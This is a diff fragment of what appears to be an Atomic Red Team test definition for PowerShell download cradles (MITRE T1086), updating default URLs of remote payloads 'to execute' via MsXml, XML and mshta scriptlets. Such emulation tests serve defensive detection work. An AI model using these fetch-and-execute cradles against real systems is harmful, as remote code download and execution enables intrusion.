    Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.

-    Provided by https://github.com/mgreen27/mgreen27.github.i
+    Provided by https://github.com/mgreen27/mgreen27.github.io
  supported_platforms:
    - windows
  input_arguments:
    url:
      description: url of payload to execute
      type: url
-      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
  executor:
    name: command_prompt
    elevation_required: false
@@ -124,7 +167,7 @@ atomic_tests:
    url:
      description: url of payload to execute
      type: url
-      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.xml
  executor:
    name: command_prompt
    elevation_required: false
@@ -142,7 +185,7 @@ atomic_tests:
    url:
      description: url of payload to execute
      type: url
-      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/mshta.sct
  executor:
    name: command_prompt
    elevation_required: false